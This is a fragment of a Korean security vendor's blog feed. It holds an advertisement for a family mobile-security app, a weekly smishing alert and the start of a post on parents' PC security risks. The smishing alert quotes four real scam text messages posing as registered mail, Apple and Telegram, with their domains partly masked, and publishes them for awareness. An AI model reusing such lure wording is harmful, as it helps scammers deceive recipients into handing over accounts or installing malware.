&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;과거에는 '조심하면 된다', '링크만 누르지 않으면 된다'는 말이 통했을지 모릅니다. 그러나 최근의 모바일 피싱은 다음과 같은 특징을 보입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;정상 메시지와 구분하기 어려운 자연스러운 문장&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;가족&amp;middot;지인&amp;middot;기관을 정교하게 사칭&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;스미싱 링크 + 악성 앱 설치까지 이어지는 다단계 공격&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;자동화&amp;middot;AI 기반 문구 생성으로 빠르게 확산&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이제는 개인의 주의력만으로 모든 위협을 차단하기 어렵습니다. 특히 부모님이나 자녀의 스마트폰을 항상 옆에서 직접 확인해 줄 수 없는 상황이라면, 사후 대응은 이미 늦은 경우가 많습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;그러므로 지금 필요한 보안의 방향은 &amp;lsquo;개인 보호&amp;rsquo;를 넘어, &lt;b&gt;가족 전체를 함께 지키는 보안&lt;/b&gt;입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;가족의 스마트폰을 한 번에 지키는 보안 - 알약 패밀리케어&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;알약패밀리케어_설명_재편집.png&quot; data-origin-width=&quot;2000&quot; data-origin-height=&quot;2400&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bz0ZAf/dJMcagqFn2r/VM6V7jhQ5Kbzk2rGk6pWSK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bz0ZAf/dJMcagqFn2r/VM6V7jhQ5Kbzk2rGk6pWSK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bz0ZAf/dJMcagqFn2r/VM6V7jhQ5Kbzk2rGk6pWSK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbz0ZAf%2FdJMcagqFn2r%2FVM6V7jhQ5Kbzk2rGk6pWSK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;2000&quot; height=&quot;2400&quot; data-filename=&quot;알약패밀리케어_설명_재편집.png&quot; data-origin-width=&quot;2000&quot; data-origin-height=&quot;2400&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이스트시큐리티의 &lt;a href=&quot;https://bit.ly/4jgR6eF&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&lt;b&gt;알약 모바일 패밀리케어&lt;/b&gt;&lt;/a&gt;는 개인 단말 보호에 머무르지 않고, 가족 구성원의 스마트폰 보안 상태를 함께 관리할 수 있는 가족형 보안 서비스입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;알약 모바일 패밀리케어는 다음과 같은 방식으로 가족의 디지털 안전을 지켜줍니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;부모님&amp;middot;자녀 등 가족 구성원의 기기를 연결해 대표 1인이 통합 관리&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;가족의 스마트폰에서 스미싱&amp;middot;피싱&amp;middot;악성 앱이 탐지되면&amp;nbsp;관리자에게 즉시 알림 전송&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;AI 기반 분석을 통해 의심 메시지와 위험 앱을 사전에 탐지&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;보안에 취약한 가족 구성원을 대신해 빠르게 상황을 인지하고 대응 가능&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;즉, 문제가 발생한 뒤 알려주는 보안이 아니라, 가족 중 누군가 위험에 노출되는 순간을 먼저 알려주는 보안입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;영화는 끝나도, 가족을 노리는 공격은 계속됩니다&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;영화는 통쾌한 결말로 마무리되지만, 현실의 피싱 범죄는 지금 이 순간에도 계속되고 있습니다. '택배 도착', '계좌 확인', '지원 결과 안내'라는 메시지를 부모님이 받고 있을지도 모릅니다. 스마트폰이 곧 지갑이자 신분증, 금융 창구가 된 시대. 모바일 보안은 더 이상 개인의 선택 문제가 아니라 가족을 위한 책임이 되고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;단 한 통의 메시지가 우리 가족의 일상을 무너뜨리지 않도록, 알약 모바일 패밀리케어로 지금 우리 가족의 스마트폰 보안을 함께 점검해 보시기 바랍니다. &lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;모바일 피싱, 더 이상 영화 속 이야기가 아닙니다.&amp;nbsp;&lt;/span&gt;알약 패밀리케어는 개인을 넘어, 가족의 디지털 안전까지 함께 지켜드립니다. (&lt;a href=&quot;https://bit.ly/4jgR6eF&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;지금 다운로드)&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;4_btn.jpg&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;1333&quot;&gt;&lt;a href=&quot;https://bit.ly/4jgR6eF&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/pVtN5/dJMcaiPvY3x/cNcYWPDEjtWwVzFcWG1ka1/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FpVtN5%2FdJMcaiPvY3x%2FcNcYWPDEjtWwVzFcWG1ka1%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1000&quot; height=&quot;1333&quot; data-filename=&quot;4_btn.jpg&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;1333&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>가족보안</category>
      <category>모바일백신</category>
      <category>모바일보안</category>
      <category>모바일보안어플</category>
      <category>모바일피싱</category>
      <category>알약모바일</category>
      <category>알약패밀리케어</category>
      <category>패밀리케어</category>
      <category>피싱방지</category>
      <category>피싱예방</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5699</guid>
      <comments>https://alyacofficialblog.tistory.com/5699#entry5699comment</comments>
      <pubDate>Fri, 9 Jan 2026 14:10:59 +0900</pubDate>
    </item>
    <item>
      <title>[Web발신] 비씨카드님이 보낸 등기 4078_****_88***를 오늘 배달예정(보관장소 별도 신청)</title>
      <link>https://alyacofficialblog.tistory.com/5698</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드.png&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/xGz6q/dJMcabiBK2a/mSuPcFDPkXvYD2Z7eTm7Jk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/xGz6q/dJMcabiBK2a/mSuPcFDPkXvYD2Z7eTm7Jk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/xGz6q/dJMcabiBK2a/mSuPcFDPkXvYD2Z7eTm7Jk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FxGz6q%2FdJMcabiBK2a%2FmSuPcFDPkXvYD2Z7eTm7Jk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;692&quot; height=&quot;440&quot; data-filename=&quot;다운로드.png&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #409d00;&quot;&gt;&lt;b&gt;[1월 둘째주]&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;알약&amp;nbsp;스미싱&amp;nbsp;알림&amp;nbsp;본&amp;nbsp;포스트는&amp;nbsp;알약M&amp;nbsp;사용자&amp;nbsp;분들이&amp;nbsp;'신고하기'&amp;nbsp;기능을&amp;nbsp;통해&amp;nbsp;알약으로&amp;nbsp;신고해&amp;nbsp;주신&amp;nbsp;스미싱&amp;nbsp;내역&amp;nbsp;중&amp;nbsp;'특이&amp;nbsp;문자'를&amp;nbsp;자체&amp;nbsp;수집,&amp;nbsp;집계하여&amp;nbsp;제공해&amp;nbsp;드리는&amp;nbsp;정보성&amp;nbsp;포스트입니다.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #409d00;&quot;&gt;&lt;b&gt;특이 문자&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;div style=&quot;color: #333333; text-align: start;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style14&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #008300; color: #ffffff; text-align: center;&quot;&gt;No.&lt;/td&gt;
&lt;td style=&quot;background-color: #008300; color: #ffffff; text-align: center;&quot;&gt;문자내용&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center;&quot;&gt;1&lt;/td&gt;
&lt;td&gt;[Web발신]&amp;nbsp;비씨카드님이&amp;nbsp;보낸&amp;nbsp;등기&amp;nbsp;4078_****_88***를&amp;nbsp;오늘&amp;nbsp;배달예정(보관장소&amp;nbsp;별도&amp;nbsp;신청)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center;&quot;&gt;2&lt;/td&gt;
&lt;td&gt;[국제발신] [Applel 귀하의 Apple ID가 다른 지역에서 로그인되고 있습니다. 즉시 확인하십시오. ap****m-kr.com&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center;&quot;&gt;3&lt;/td&gt;
&lt;td&gt;[국외발신] [Apple] 귀하의 App Sotre에서 이상지출이 발생했습니다. 즉시 확인해 주세요. app-***r.com&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center;&quot;&gt;4&lt;/td&gt;
&lt;td&gt;[국제발신] Telegram 인증만료 계정 인증 통해 활성화 하세요. https://a**r.ee/t****p&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드 (1).png&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b0hHU0/dJMcabiBK2o/XkKynPrqVMhsVNx3Lpv3M0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b0hHU0/dJMcabiBK2o/XkKynPrqVMhsVNx3Lpv3M0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b0hHU0/dJMcabiBK2o/XkKynPrqVMhsVNx3Lpv3M0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb0hHU0%2FdJMcabiBK2o%2FXkKynPrqVMhsVNx3Lpv3M0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-filename=&quot;다운로드 (1).png&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;출처&amp;nbsp;:&amp;nbsp;알약M&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;기간 : 2026년 1월 2일 ~ 2025년 1월 9일&lt;/p&gt;</description>
      <category>안전한 PC&amp;amp;모바일 세상/스미싱 알림</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5698</guid>
      <comments>https://alyacofficialblog.tistory.com/5698#entry5698comment</comments>
      <pubDate>Fri, 9 Jan 2026 11:31:56 +0900</pubDate>
    </item>
    <item>
      <title>부모님 PC 보안도 걱정 끝! 알약 3.0으로 쉽고 안전하게 관리하는 법</title>
      <link>https://alyacofficialblog.tistory.com/5697</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333;&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #555555; font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;부모님께서 '컴퓨터가 갑자기 느려졌다', '이상한 창이 계속 뜬다'는 말을 하신 적 있으신가요? 직접 가서 확인해 드리기 어려운 상황에서는 정확한 원인을 파악하기도, 어떻게 조치해야 할지 설명드리기도 쉽지 않습니다. 이런 불편은 단순히 PC 사용이 익숙하지 않아서라기보다, 최근 보안 위협이 점점 더 교묘해지고 있기 때문에 발생합니다.&lt;/span&gt;&lt;/p&gt;
&lt;div id=&quot;SE-a07fa009-0ba1-449f-be12-618269a98d04&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;p id=&quot;SE-4ba80439-f42e-4f8e-83d1-529c96a9fae7&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;​&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-992c7d9d-82d8-42d6-b04a-86962e72db4d&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;773&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/br3fdG/dJMcaihu5cu/eE2s2OQjqX8wQf2Hick82K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/br3fdG/dJMcaihu5cu/eE2s2OQjqX8wQf2Hick82K/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/br3fdG/dJMcaihu5cu/eE2s2OQjqX8wQf2Hick82K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbr3fdG%2FdJMcaihu5cu%2FeE2s2OQjqX8wQf2Hick82K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;773&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;773&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;

&lt;div&gt;
&lt;p style=&quot;color: #ffffff;&quot; data-ke-size=&quot;size16&quot;&gt;AI 활용&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-62310300-3c8d-48b9-8e6a-6348e8aa1f81&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;p id=&quot;SE-cdd5568c-0c12-4cc2-b932-6ceb0e270d90&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;​&lt;/span&gt;&lt;/p&gt;
&lt;p id=&quot;SE-b6cfb36d-3598-4cd4-a143-e9d26ffe8a91&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #0078cb;&quot;&gt;&lt;b&gt;​&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3 id=&quot;SE-c5e57503-39ea-45ea-a7d8-2aac54219483&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #0078cb;&quot;&gt;&lt;b&gt;왜 부모님 PC는 보안 위협에 더 취약할까?&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;부모님 PC의 문제는 &lt;span&gt;위협을 정상 화면과 구분하기 어렵다는 점&lt;/span&gt;에서 시작됩니다. 최근 악성코드는 정상 프로그램이나 안내 화면을 그대로 흉내 내 판단 실수를 유도하는 방식으로 진화하고 있습니다.&lt;/p&gt;
&lt;p id=&quot;SE-171f9ef2-e13f-4de6-b8ed-aa80ce13f11a&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;​&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1) 광고창&amp;middot;경고창의 진위 구분 어려움&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;악성 팝업이 정상 프로그램처럼 보이는 경우 증가&lt;/li&gt;
&lt;li&gt;&amp;lsquo;닫기(X)&amp;rsquo;처럼 위장된 버튼 클릭으로 감염 발생&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;2) 무료 프로그램 설치 시 번들 프로그램 감염&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;체크박스 해제를 놓치면 광고 프로그램&amp;middot;스파이웨어 자동 설치&lt;/li&gt;
&lt;li&gt;설치 과정이 복잡해 부모님 세대가 실수하기 쉬움&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;3) 링크&amp;middot;페이지 위험성 판단의 어려움&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;검색 광고, 문자 메시지 링크, 이메일 첨부파일 등 겉으로 안전해 보이는 경로를 통해 감염&lt;/li&gt;
&lt;li&gt;정상처럼 보이는 사이트에도 악성 스크립트 가능&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;4) USB&amp;middot;외장하드 사용 빈도 높음&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;감염된 USB 하나만 연결해도 악성코드가 PC 전체에 확산&lt;/li&gt;
&lt;li&gt;부모님 세대의 파일 이동 방식과 맞물려 위험성 증가&lt;/li&gt;
&lt;/ul&gt;
